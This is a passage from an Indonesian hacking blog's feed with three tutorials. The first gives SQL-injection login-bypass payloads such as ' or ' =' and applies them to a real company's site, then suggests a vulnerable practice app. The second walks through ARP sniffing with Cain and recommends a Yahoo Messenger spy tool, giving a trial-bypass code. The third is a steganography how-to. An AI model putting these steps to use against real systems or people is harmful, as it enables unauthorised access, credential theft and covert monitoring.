08</description><link>http://xpemula.blogspot.com/2009/02/tool-berbahaya-bagi-windows.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizR_m2SIgSx_V0ftGm6gb_sLgU1SbkdWpPIOqteK6aPPjrCZcKnrORCE6wkOvqq-q_ejSUvlYuJNUdty2MbiiC-KsdMrTatdNJS-piRLm7vLBAq5ec7jWgypW6C3B3Mtuh7yakF0xtpq0/s72-c/dxe45_1.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-6413899261324581356</guid><pubDate>Thu, 08 Jan 2009 04:17:00 +0000</pubDate><atom:updated>2009-07-08T08:32:26.289-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Jaringan</category><title>SQL Injection</title><description>&lt;div style="text-align: justify;"&gt;Kali ini kita akan membicarakan sedikit tentang SQL Injection, disini kita akan membahas tentang kemungkinan celah untuk melakukan penyerangan melalui SQL Injection. Berbeda dengan penyerangan XSS yang berdampak pada pengunjung sebuah situs, penyerangan SQL Injection langsung menyerang pada situs itu sendiri dan tentu saja yang menjadi sasaran adalah database nya.&lt;br /&gt;Saya akan mengambil contoh situs BUMN yang cukup besar. Walaupn data yang kita peroleh dari contoh berikut bukan sesuatu yang teramat penting, tapi dari sini kita bisa melihat bahwa para administrator masih banyak yang lalai terhadap sisi keamanan dan kredibilitas baik admin ataupun perusahaan menjadi taruhannya.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ5oenaSb5K4b-zyT61d1sb6OZjlPMpYk3T5b9InkJicZkaK_wKbjwcCRDABxB9Id0N_oZCxKXnYcI70Bns_BiMcsdafLcEd3nFAj6bSgxAKKbjfKxes8DRBU_p06Kamp2NNUhuAkOAxA/s1600-h/form.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 197px; height: 301px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ5oenaSb5K4b-zyT61d1sb6OZjlPMpYk3T5b9InkJicZkaK_wKbjwcCRDABxB9Id0N_oZCxKXnYcI70Bns_BiMcsdafLcEd3nFAj6bSgxAKKbjfKxes8DRBU_p06Kamp2NNUhuAkOAxA/s400/form.jpg" alt="" id="BLOGGER_PHOTO_ID_5288774398750569042" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Pada form login kita masukkan &lt;span style="font-style: italic;"&gt;' or ' &lt;/span&gt;  dan hal serupa kita masukkan pada field password&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAM784Kbb52kvgE4sXhCv0lgrxQGxMnjp9JUaXPoWDHd2-c3r33LegN4zKb1KYrPOP87sPCNA55KqE_UlLy3ZQsnJiV8YE2voS3tMcG9O80uWzVm4gLOpmJDspdwRxvXXc5nwo3B76YyU/s1600-h/login.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 197px; height: 301px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAM784Kbb52kvgE4sXhCv0lgrxQGxMnjp9JUaXPoWDHd2-c3r33LegN4zKb1KYrPOP87sPCNA55KqE_UlLy3ZQsnJiV8YE2voS3tMcG9O80uWzVm4gLOpmJDspdwRxvXXc5nwo3B76YyU/s400/login.jpg" alt="" id="BLOGGER_PHOTO_ID_5288774403668906434" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hasilnya akan tampak seperti berikut&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifg0k-rCN_I5fxXq7fl-au__3IAem02U8Hjb5SIGVMfXi3aJWwulfzp-y7fGBNvBzFwdJH0-v1SOzawlSQfoN6XYwR0ykqKNIcVTWpK8zDbbS4Ihi393JCkEsXHXccSxhQ5xP45LsvXFo/s1600-h/hasil.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 197px; height: 301px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifg0k-rCN_I5fxXq7fl-au__3IAem02U8Hjb5SIGVMfXi3aJWwulfzp-y7fGBNvBzFwdJH0-v1SOzawlSQfoN6XYwR0ykqKNIcVTWpK8zDbbS4Ihi393JCkEsXHXccSxhQ5xP45LsvXFo/s400/hasil.jpg" alt="" id="BLOGGER_PHOTO_ID_5288774407627439506" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;atau kita ambil contoh kode lainnya&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;' or ' ='&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;mengapa bisa demikian?&lt;br /&gt;Pada form login, pada umumnya statment nya sebagai berikut:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-style: italic;"&gt;SELECT * FROM tabel WHERE&lt;/span&gt; &lt;span style="font-style: italic;"&gt;field_username = input _username AND&lt;/span&gt; &lt;span style="font-style: italic;"&gt;field_password = input_password&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;begitu kita mengekseskusi &lt;span style="font-style: italic;"&gt;' or ' ='&lt;/span&gt; maka perintahnya akan menjadi&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-style: italic;"&gt;SELECT * FROM tabel WHERE field_username  "or"='' AND field_password = ''OR'' = ''&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Logika OR menyebab kan perintah SQL selalu mengembalikan nilai true sehingga sistem akan mengizinkan anda masuk ke wilayah yang seharusnya dimasuki oleh member atau admin.&lt;br /&gt;&lt;br /&gt;Untuk bahan percobaan, silahkan gunakan sebuah sistem yang memang dibuat dengan celah keamanan dari sisi SQL Injection sangat terbuka. Anda bisa sedot dari www.foundstone.com/us/resourse-free-tools.asp dengan nama file &lt;span style="font-style: italic;"&gt;hacmebank&lt;/span&gt; atau &lt;span style="font-style: italic;"&gt;hacmebank2_source.zip&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Hal yang perlu anda persiapkan untuk menjalankan sistem tersebut adalah:&lt;br /&gt;1. Microsoft.NET Framework v1.1&lt;br /&gt;2. Microsoft IIS&lt;br /&gt;3. MSDE 2000Release A&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Sebenarnya, banyak hal yang bisa dilakukan untuk aksi penyerangan melalui SQL Injection, namun disini saya hanya ingin membahas tentang apa itu SQL Injection seperti apa alur logika nya dan cara yang saya gunakan di atas adalah cara yang biasa dilakukan untuk penetrasi awal. Jadi untuk hal-hal yang lebih lanjut anda bisa googling untuk mendapatkan cara ataupun cheat code nya.&lt;br /&gt;&lt;br /&gt;Lantas apa yang bisa dilakukan untuk mencegah hal tersebut?&lt;br /&gt;1. kesadaran individu terhadap keamanan akan sistem yang dikelolanya dalam hal ini sang admin. Umumnya username menggunakan id "admin", cobalah ganti dengan 4Dm1n atau sebagainya, hal ini dimaksudkan agar tidak mudah ditebak&lt;br /&gt;2. lakukan penyaringan pada field, batasi jumlah karakter hanya pada a-z, A-Z, 1-0, ("_","@","." bila anda menggunakan id dengan email), tolak karakter khusus seperti *, &amp;amp;, ' dsb.&lt;br /&gt;3. Anda bisa menggunakan tools dari pihak ketiga untuk menguji sistem yang anda buat.&lt;br /&gt;4. perhatikan script dan syntax nya.&lt;br /&gt;5. dll&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</description><link>http://xpemula.blogspot.com/2009/01/sql-injection.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ5oenaSb5K4b-zyT61d1sb6OZjlPMpYk3T5b9InkJicZkaK_wKbjwcCRDABxB9Id0N_oZCxKXnYcI70Bns_BiMcsdafLcEd3nFAj6bSgxAKKbjfKxes8DRBU_p06Kamp2NNUhuAkOAxA/s72-c/form.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-7715433224310659145</guid><pubDate>Sat, 20 Dec 2008 19:58:00 +0000</pubDate><atom:updated>2009-07-08T08:40:11.990-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Jaringan</category><title>Sniffing Dengan Cain Part II</title><description>kPada tulisan ini, saya hanya menyambung bahasan tentang cain yang pernah dibicarakan sebelumnya. Untuk mendapatkan tool nya silahkan sedot di http://oxid.it/cain.html, jadi untuk mengetahui tentang fungsi-fungsinya silahkan baca pada tulisan sebelumnya.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi73YYd7whmuzCF4Q9tSSaaAa_fPlq3HlS9V2DMFnTq79l5gwWcGhPr1gfDj8lM4IneVFvQP2EQId__5_XhFvJXs9Ajx4xFak-pXmSCpYBzz_HVXvX3EkrOOx4uqC4kNjE8XRp2Mtodpo/s1600-h/langkah1.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 332px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi73YYd7whmuzCF4Q9tSSaaAa_fPlq3HlS9V2DMFnTq79l5gwWcGhPr1gfDj8lM4IneVFvQP2EQId__5_XhFvJXs9Ajx4xFak-pXmSCpYBzz_HVXvX3EkrOOx4uqC4kNjE8XRp2Mtodpo/s400/langkah1.jpg" alt="" id="BLOGGER_PHOTO_ID_5281964779716355170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Klik Configure, kemudian akan muncul&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUrlI0E-DURq3QGNih3I9TAOGA632yTJ8X_KwIfrLtU2jwtb_AqK3e6q-sR2sg1du34EV-DGZC8x2PuH10DjPe-99qNJM1nB3Rbkw5jN2TbGdrG3pO_qDuOsTwPUPGenGCxYi0arrBKlQ/s1600-h/capture_03122008_110536.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 332px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUrlI0E-DURq3QGNih3I9TAOGA632yTJ8X_KwIfrLtU2jwtb_AqK3e6q-sR2sg1du34EV-DGZC8x2PuH10DjPe-99qNJM1nB3Rbkw5jN2TbGdrG3pO_qDuOsTwPUPGenGCxYi0arrBKlQ/s400/capture_03122008_110536.jpg" alt="" id="BLOGGER_PHOTO_ID_5281965062712165922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Klik &lt;span style="font-weight: bold;"&gt;Ok&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;2. Klik tombol Start/Stop sniffer&lt;br /&gt;3. Klik tombol Start/Stop APR&lt;br /&gt;4. Klik tab Sniffer&lt;br /&gt;&lt;br /&gt;Simpel, kan? Yang perlu diperhatikan ialah configurasi dari jaringan itu sendiri, hal ini berhubungan dengan sang admin dalam membangun jaringannya.&lt;br /&gt;Pada tulisan sebelumnya, saya menganjurkan untuk melakukan &lt;span style="font-style: italic;"&gt;ping &lt;/span&gt;terhadap kompy target, dengan tujuan supaya komputer kita terhubung dengan komputer target.&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_wFbBRqeG9rRwBnN3uSIfxpjIfeS6e_l8KDdq3ocBTSEqy_FVuox3wIHfcdYGquco5f_DEBZ1DSYOxX1qQm4HNHm6Pofv14UXOk4eDGpmM-5t4A6xl2zn8i8wmgG7DCZwBObVdxQ6io/s1600-h/capture_17122008_150219.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 340px; height: 323px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH_wFbBRqeG9rRwBnN3uSIfxpjIfeS6e_l8KDdq3ocBTSEqy_FVuox3wIHfcdYGquco5f_DEBZ1DSYOxX1qQm4HNHm6Pofv14UXOk4eDGpmM-5t4A6xl2zn8i8wmgG7DCZwBObVdxQ6io/s400/capture_17122008_150219.jpg" alt="" id="BLOGGER_PHOTO_ID_5281966734245806690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;Sebenarnya, untuk melakukan komunikasi dengan komputer target, bukan hanya pinging yang bisa kita lakukan, anda bisa menggunakan Yahoochecker, selain nyari username dan password kita juga bisa memonitor target, barangkali dia sedang chat di YM.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;Untuk tool nya, bisa Anda sedot di http://www.download3k.com/Install-IMMonitor-Yahoo-Messenger-Spy.html&lt;br /&gt;namun, yang anda dapatkan adalah versi trial, anda bisa memasukkan kode &lt;span style="font-style: italic;"&gt;4BE6183BB5841628&lt;/span&gt; supaya tidak menunggu counter.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiaYCSBkIO82rMVPGmeh2_sdDUgHrzxrZWm-uFbAv2ejXV3AnXpzvCJjOUpIhk99a5CpA4OPNQoTtys3HstuaWka_ykoRepvR1WZ5h4fBQdU0SF6gIJne8clT47dKTgKaRnCOsuRWVrdY/s1600-h/capture_03122008_110622.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 357px; height: 225px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiaYCSBkIO82rMVPGmeh2_sdDUgHrzxrZWm-uFbAv2ejXV3AnXpzvCJjOUpIhk99a5CpA4OPNQoTtys3HstuaWka_ykoRepvR1WZ5h4fBQdU0SF6gIJne8clT47dKTgKaRnCOsuRWVrdY/s400/capture_03122008_110622.jpg" alt="" id="BLOGGER_PHOTO_ID_5281967100864038402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;Selanjutnya, bagaimana cara kita menghindari aksi sniffing tersebut?&lt;br /&gt;&lt;br /&gt;Selain dengan cara merubah type MAC Address dari dynamic ke static, anda juga bisa mempersiapkan form login yang biasa anda gunakan dari local drive atau gunakan web yang menyediakan form login. Misalnya pada http://xpemula terdapat form login untuk yahoomail, itu bisa anda gunakan.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY_BHFtJGMS4ysBsSpvWxZAURwT9GR1Ba3g1DZAKl2i4IOqAFfvsTc1ZCIFNGmI9BrYUYKJoXIHfkLJsVO7QBDMLXLevHEmxjygzYArnSr52P2Q9KbIn1xqDpaw-y629f89nTpJ_vnZe8/s1600-h/login.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 332px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY_BHFtJGMS4ysBsSpvWxZAURwT9GR1Ba3g1DZAKl2i4IOqAFfvsTc1ZCIFNGmI9BrYUYKJoXIHfkLJsVO7QBDMLXLevHEmxjygzYArnSr52P2Q9KbIn1xqDpaw-y629f89nTpJ_vnZe8/s400/login.jpg" alt="" id="BLOGGER_PHOTO_ID_5281967314273815762" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;karena pada beberapa kasus cain akan membaca alamat xpemula walaupun sebenarnya kita sudah berada di dalam yahoomail&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvbVrMdgoj7jV3rxExQDCWNdLglRja0zNEWMgnXzaGCC9gvJZifmEU5cP8ce0IXabZ93P3rW3ysMVwtfCurHWlVTJYinfXJBxYzEyY4EenKBQt0OgAEfFezh9TVlwQ8w8Cz5BgwydiTB8/s1600-h/inbox.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 332px; height: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvbVrMdgoj7jV3rxExQDCWNdLglRja0zNEWMgnXzaGCC9gvJZifmEU5cP8ce0IXabZ93P3rW3ysMVwtfCurHWlVTJYinfXJBxYzEyY4EenKBQt0OgAEfFezh9TVlwQ8w8Cz5BgwydiTB8/s400/inbox.jpg" alt="" id="BLOGGER_PHOTO_ID_5281967532249834994" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Selain itu, cain biasanya hanya mampu menangkap 10 karakter dari password, jadi buatlah password minimal lebih dari 10 karakter.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;Semoga tulisan ini bisa lebih memperjelas tentang cara penggunaan cain&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span&gt;&lt;span style=";font-family:Verdana;font-size:9;"  &gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://xpemula.blogspot.com/2008/12/pada-tulisan-ini-saya-hanya-menyambung.html</link><author>noreply@blogger.com (BlackSignal)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi73YYd7whmuzCF4Q9tSSaaAa_fPlq3HlS9V2DMFnTq79l5gwWcGhPr1gfDj8lM4IneVFvQP2EQId__5_XhFvJXs9Ajx4xFak-pXmSCpYBzz_HVXvX3EkrOOx4uqC4kNjE8XRp2Mtodpo/s72-c/langkah1.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2077944732030875776.post-5972895355820418878</guid><pubDate>Fri, 21 Nov 2008 03:13:00 +0000</pubDate><atom:updated>2009-03-12T19:54:44.283-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Komputer</category><title>Steganograph</title><description>Selama ini, cara yang digunakan untuk melindungi data rahasia ada dua macam, yaitu &lt;span style="font-style: italic;"&gt;Kriptography&lt;/span&gt; dan &lt;span style="font-style: italic;"&gt;Steganography&lt;/span&gt;. Namun yang umun digunakan adalah kriptography yaitu dengan cara mengacak, contohnya file sam pada windows yang menyimpan account user.&lt;br /&gt;Pada tulisan ini saya tidak akan membahas tentang kriptography, melainkan akan membahas cara yang kedua yaitu steganography. Steganography merupakan salah satu cara melindungi sebuah data dengan cara disembunyikan dibalik file lain, misalnya gambar. Sebenarnya ada beberapa tool yang bisa digunakan untuk melakukan pekerjaan ini, tapi kali ini saya tidak akan menyertakan tool. Perlu diketahui, apabila kita mengencode sebuah data dengan tool steganography maka untuk mengekstak nya harus menggunakan tool yang sama.&lt;br /&gt;Seperti yang saya katakan tadi, saya tidak akan menggunakan tool tapi akan memanfaatkan sebuah web. Silahkan buka &lt;span style="font-style: italic;"&gt;http://utilitymill.com/utility/steganography_encode&lt;/span&gt;. Tampilannya seperti ini&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEive3hJ2RpT5Yeu_Fdb2EQgRb-3aC-f3h6cy_vj0KUSBPYHKuZxSOCeuPxoEpfrz4qvV7ypkTEXMDv8EnB-UYrCT5ULkAJAtPpzlxR0ccdfmXYHdaE3WDdcYIy4lHlZ0f7oEPryo7jdoRQ/s1600-h/capture_21112008_085424.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 264px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEive3hJ2RpT5Yeu_Fdb2EQgRb-3aC-f3h6cy_vj0KUSBPYHKuZxSOCeuPxoEpfrz4qvV7ypkTEXMDv8EnB-UYrCT5ULkAJAtPpzlxR0ccdfmXYHdaE3WDdcYIy4lHlZ0f7oEPryo7jdoRQ/s400/capture_21112008_085424.jpg" alt="" id="BLOGGER_PHOTO_ID_5270946844099701650" border="0" /&gt;&lt;/a&gt;sistem ini hanya support terhadap file gambar dengan ekstensi .bmp dan .png&lt;br /&gt;Sekarang akan kita coba untuk mengencode sebuah data, untuk itu siapkan sebuah file bmp atau png.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_JuZ7VMTDk2bPmuEW-aelT3S6fPBDU8wO7x6q7k9vH5wbltGwdHB2NJBSdU_THy6MBWuPZqu61ttjB18Fv7-zIZ6h0YllPLNcrVqpNDqw7BUm7PhCR8TSDZs9TNdONEcM6_n0LiIf9ZE/s1600-h/simplas.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 197px; height: 301px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_JuZ7VMTDk2bPmuEW-aelT3S6fPBDU8wO7x6q7k9vH5wbltGwdHB2NJBSdU_THy6MBWuPZqu61ttjB18Fv7-zIZ6h0YllPLNcrVqpNDqw7BUm7PhCR8TSDZs9TNdONEcM6_n0LiIf9ZE/s400/simplas.jpg" alt="" id="BLOGGER_PHOTO_ID_5270947842637840514" border="0" /&gt;&lt;/a&gt;1. Klik Browse untuk mengambil file yang akan di encode, dalam hal ini saya mengguakan file berkestensi bmp&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtaUneJJlYd5tGXHjn6Z9H4zShXP_x0UTk_UCxpQ0AY1p004QLMtwFc4rnxd0YxnqqeT6-gtnzzfLvOSyvlqcybIH64DM6XlFWmeMK3fHAqcimYfIR3o-_FPK-Qr8gdRavaTpWrUCXkGg/s1600-h/capture_21112008_104034.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 293px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtaUneJJlYd5tGXHjn6Z9H4zShXP_x0UTk_UCxpQ0AY1p004QLMtwFc4rnxd0YxnqqeT6-gtnzzfLvOSyvlqcybIH64DM6XlFWmeMK3fHAqcimYfIR3o-_FPK-Qr8gdRavaTpWrUCXkGg/s400/capture_21112008_104034.jpg" alt="" id="BLOGGER_PHOTO_ID_5270950926170708290" border="0" /&gt;&lt;/a&gt;klik open&lt;br /&gt;2. Masukkan data yang akan di sembunyikan, sebagai contoh saya memasukkan kalimat "pin untuk save deposite bank adalah abcd678ex" tanpa tanda kutif.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6h23TI5N55GNuzan6whSBNdd4fzpHT78Qh2K8ECddbked4pfKSZvpS3CcNUblUW9W2TLdE1fBAjnvzAv6sY0CO6L4RpDtOQTeAHY2eSIOaVinstH_KthQOoPsy5Zl5VCD5-Kf-cMZKZA/s1600-h/text.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 178px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6h23TI5N55GNuzan6whSBNdd4fzpHT78Qh2K8ECddbked4pfKSZvpS3CcNUblUW9W2TLdE1fBAjnvzAv6sY0CO6L4RpDtOQTeAHY2eSIOaVinstH_KthQOoPsy5Zl5VCD5-Kf-cMZKZA/s400/text.jpg" alt="" id="BLOGGER_PHOTO_ID_5270955098606040402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;3. Pilih ekstensi file yang digunakan&lt;br /&gt;4. Klik Go&lt;br /&gt;Setelah semua langkah tadi selesai dilakukan tunggulah beberapa saat kemudian muncul&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try 